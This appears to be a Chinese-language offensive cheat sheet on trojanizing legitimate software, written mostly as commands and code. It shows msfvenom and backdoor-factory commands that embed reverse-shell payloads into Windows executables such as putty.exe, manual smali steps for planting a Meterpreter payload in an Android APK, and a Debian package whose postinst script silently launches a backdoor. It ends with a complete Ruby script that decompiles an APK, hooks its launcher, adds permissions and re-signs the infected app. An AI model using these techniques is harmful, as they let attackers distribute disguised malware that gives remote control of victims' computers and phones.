msfvenom -a x86 --platform windows -x putty.exe -k -p windows/shell/reverse_tcp LHOST=x.x.x.x LPORT=xxx -e ... -f exe > testtmp.exe

在指定程序中注入payloadbackdoor-factory -f Test.exe -S 　　　　　　　　　　　　　　　　　　#检测是否支持注入backdoor-factory -f Test.exe -s show 　　　　　　　　　　　　　　　　 #查看注入payload所需参数backdoor-factory -f Test.exe -s .... -H <host> -P <Port> -abackdoor -i -s reverse_shell_tcp -H AttackerHost -P port -a -D　　#自动搜索应用程序(-i)并注入反弹payload(-a),并删除原文件(-D)-u .moocowwow #-u参数则代表把原文件改为指定拓展名的文件

msfpayload windows/exec CMD=‘calc.exe‘ R > calc.binbackdoor.py -f psexec.exe -s user_supplied_shellcode -U calc.bin

>native/backdoor_factory>set LHOST .....>set LPORT>set orig_exe /path/要注入的后门程序>info 查看信息>generate 生成payload设置名字时不要加拓展名 

(1)ruby apk-embed-payload.rb <Normal.apk> -p android/meterpreter/reverse_tcp LHOST=... LPORT=... -o /path/embed-backdoor.apk(2)d2j-apk-sign 文件名　　　　　//重新对生成的APK文件签名(d2j-apk-sign kali自带)

(1)msfvenom -p ..... payload.apk(2)apktool d /path/payload.apk　 apktool d /path/Normal_File.apk　 把逆向payload中的smail/com中的文件夹复制到正常文件逆向后的smail/com文件夹中(3)在正常逆向的apk文件中的AndroidManifest.xml搜索‘ LAUNCHER‘　　　　如android:targetActive="com.facebook.nodex.startup.splashscreen.NodexSplashActivity">　　　　targetActive :程序开始的地方，根据此路径找到NodexSplashActivity.smali文件;(4)在该文件中搜索‘onCreate‘:　　　　invoke-super {p0,p1}, Lcom/facebook/nodex/startup/splashscreen/AbstractNodexSplashActivity;　　　　->onCreate(Landroid/os/Bundle;)V　　在该语句下方添加一条执行payload的语句：　　invoke-static {p0},Lcom/metaspolit/stage/Payload;->start(Landroid/content/Context;)V(5)把payload AndroidManifest.xml 中 <user-permission abdroid:name="....">语句添加到正常APK对应位置(6)重新编译APK文件: apktool b /Normal/(7)d2j-apk-sign 文件名 #重新签名

(1)dpkg -x xx.deb xxx 　　　　　　　　　　#把xx.deb解包到xxx文件夹(2)在xxx目录新建DEBIAN（必须大写）文件夹(3)touch control postinst 　　　　　　　 #在DEBIAN文件夹新建control和postinst文件(4)nano control 　　　　　　　　　　　　　 #写入软件包的信息，比较重要，如果有错误可能导致无法安装，所以建议直接复制原软件包中 control文件所有内容(5)复制后门程序到解包文件夹下 /usr/bin 目录里(6)vi postinst 　　　　　　　　　　　　　　#这个是安装软件是执行的脚本，这个也是我们后门程序运行的关键，内容可参考如下：　　#！/bin/sh　　sudo chmod 2775 /usr/bin/backdoor && sudo /usr/bin/backdoor & #执行后门程序，如这里backdoor　　sudo /usr/bin/xxx -V #安装后显示软件版本信息，这里参数可能不太一样，也可以自定义执行的参数(7)chmod 555 postinst #postinst的执行权限为>=555且=<775(8)dpkg-deb --build xxx/ xxx.deb #检查一遍没有问题就可以打包了本机开始监听，软件发送到目标客户端执行。。。

#!/usr/bin/env ruby# apk_backdoor.rb# This script is a POC for injecting metasploit payloads on http://vinayakwadhwa.in/apk-embed-payload.rb# arbitrary APKs.# Authored by timwr, Jack64# Redistributed by PFSFXrequire ‘nokogiri‘require ‘fileutils‘require ‘optparse‘# Find the activity thatapk_backdoor.rb  is opened when you click the app icondef findlauncheractivity(amanifest)    package = amanifest.xpath("//manifest").first[‘package‘]    activities = amanifest.xpath("//activity|//activity-alias")    for activity in activities        activityname = activity.attribute("name")        category = activity.search(‘category‘)        unless category            next        end        for cat in category            categoryname = cat.attribute(‘name‘)            if (categoryname.to_s == ‘android.intent.category.LAUNCHER‘ || categoryname.to_s == ‘android.intent.action.MAIN‘)                activityname = activityname.to_s                unless activityname.start_with?(package)                    activityname = package + activityname                end                return activityname            end        end    endend# If XML parsing of the manifest fails, recursively search# the smali code for the onCreate() hook and let the user# pick the injection pointdef scrapeFilesForLauncherActivity()    smali_files||=[]    Dir.glob(‘original/smali*/**/*.smali‘) do |file|      checkFile=File.read(file)      if (checkFile.include?";->onCreate(Landroid/os/Bundle;)V")        smali_files << file        smalifile = file        activitysmali = checkFile      end    end    i=0    print "[*] Please choose from one of the following:\n"    smali_files.each{|s_file|        print "[+] Hook point ",i,": ",s_file,"\n"        i+=1    }    hook=-1    while (hook < 0 || hook>i)        print "\nHook: "        hook = STDIN.gets.chomp.to_i    end    i=0    smalifile=""    activitysmali=""    smali_files.each{|s_file|        if (i==hook)            checkFile=File.read(s_file)            smalifile=s_file            activitysmali = checkFile            break        end        i+=1    }    return [smalifile,activitysmali]enddef fix_manifest()    payload_permissions=[]    #Load payload‘s permissions    File.open("payload/AndroidManifest.xml","r"){|file|        k=File.read(file)        payload_manifest=Nokogiri::XML(k)        permissions = payload_manifest.xpath("//manifest/uses-permission")        for permission in permissions            name=permission.attribute("name")            payload_permissions << name.to_s        end    #   print "#{k}"    }    original_permissions=[]    apk_mani=‘‘    #Load original apk‘s permissions    File.open("original/AndroidManifest.xml","r"){|file2|        k=File.read(file2)        apk_mani=k        original_manifest=Nokogiri::XML(k)        permissions = original_manifest.xpath("//manifest/uses-permission")        for permission in permissions            name=permission.attribute("name")            original_permissions << name.to_s        end    #   print "#{k}"    }    #Get permissions that are not in original APK    add_permissions=[]    for permission in payload_permissions        if !(original_permissions.include? permission)            print "[*] Adding #{permission}\n"            add_permissions << permission        end    end    inject=0    new_mani=""    #Inject permissions in original APK‘s manifest    for line in apk_mani.split("\n")        if (line.include? "uses-permission" and inject==0)            for permission in add_permissions                new_mani << ‘<uses-permission android:name="‘+permission+‘"/>‘+"\n"            end            new_mani << line+"\n"            inject=1        else            new_mani << line+"\n"        end    end    File.open("original/AndroidManifest.xml", "w") {|file| file.puts new_mani }endapkfile = ARGV[0]unless(apkfile && File.readable?(apkfile))    puts "Usage: #{$0} [target.apk] [msfvenom options]\n"    puts "e.g. #{$0} messenger.apk -p android/meterpreter/reverse_https LHOST=192.168.1.1 LPORT=8443"    exit(1)endjarsigner = `which jarsigner`unless(jarsigner && jarsigner.length > 0)    puts "No jarsigner"    exit(1)endapktool = `which apktool`unless(apktool && apktool.length > 0)    puts "No apktool"    exit(1)endapk_v=`apktool`unless(apk_v.split()[1].include?("v2."))    puts "[-] Apktool version #{apk_v} not supported, please download the latest 2. version from git.\n"    exit(1)endbegin    msfvenom_opts = ARGV[1,ARGV.length]    opts=""    msfvenom_opts.each{|x|    opts+=x    opts+=" "    }rescue    puts "Usage: #{$0} [target.apk] [msfvenom options]\n"    puts "e.g. #{$0} messenger.apk -p android/meterpreter/reverse_https LHOST=192.168.1.1 LPORT=8443"    puts "[-] Error parsing msfvenom options. Exiting.\n"    exit(1)endprint "[*] Generating msfvenom payload..\n"res=`msfvenom -f raw #{opts} -o payload.apk 2>&1`if res.downcase.include?("invalid" || "error")    puts res    exit(1)endprint "[*] Signing payload..\n"`jarsigner -verbose -keystore ~/.android/debug.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA payload.apk androiddebugkey``rm -rf original``rm -rf payload``cp #{apkfile} original.apk`print "[*] Decompiling orignal APK..\n"`apktool d $(pwd)/original.apk -o $(pwd)/original`print "[*] Decompiling payload APK..\n"`apktool d $(pwd)/payload.apk -o $(pwd)/payload`f = File.open("original/AndroidManifest.xml")amanifest = Nokogiri::XML(f)f.closeprint "[*] Locating onCreate() hook..\n"launcheractivity = findlauncheractivity(amanifest)smalifile = ‘original/smali/‘ + launcheractivity.gsub(/\./, "/") + ‘.smali‘begin    activitysmali = File.read(smalifile)rescue Errno::ENOENT    print "[!] Unable to find correct hook automatically\n"    begin        results=scrapeFilesForLauncherActivity()        smalifile=results[0]        activitysmali=results[1]    rescue        puts "[-] Error finding launcher activity. Exiting"        exit(1)    endendprint "[*] Copying payload files..\n"FileUtils.mkdir_p(‘original/smali/com/metasploit/stage/‘)FileUtils.cp Dir.glob(‘payload/smali/com/metasploit/stage/Payload*.smali‘), ‘original/smali/com/metasploit/stage/‘activitycreate = ‘;->onCreate(Landroid/os/Bundle;)V‘payloadhook = activitycreate + "\n    invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V"hookedsmali = activitysmali.gsub(activitycreate, payloadhook)print "[*] Loading ",smalifile," and injecting payload..\n"File.open(smalifile, "w") {|file| file.puts hookedsmali }injected_apk=apkfile.split(".")[0]injected_apk+="_backdoored.apk"print "[*] Poisoning the manifest with meterpreter permissions..\n"fix_manifest()print "[*] Rebuilding #{apkfile} with meterpreter injection as #{injected_apk}..\n"`apktool b -o $(pwd)/#{injected_apk} $(pwd)/original`print "[*] Signing #{injected_apk} ..\n"`jarsigner -verbose -keystore ~/.android/debug.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA #{injected_apk} androiddebugkey`puts "[+] Infected file #{injected_apk} ready.\n"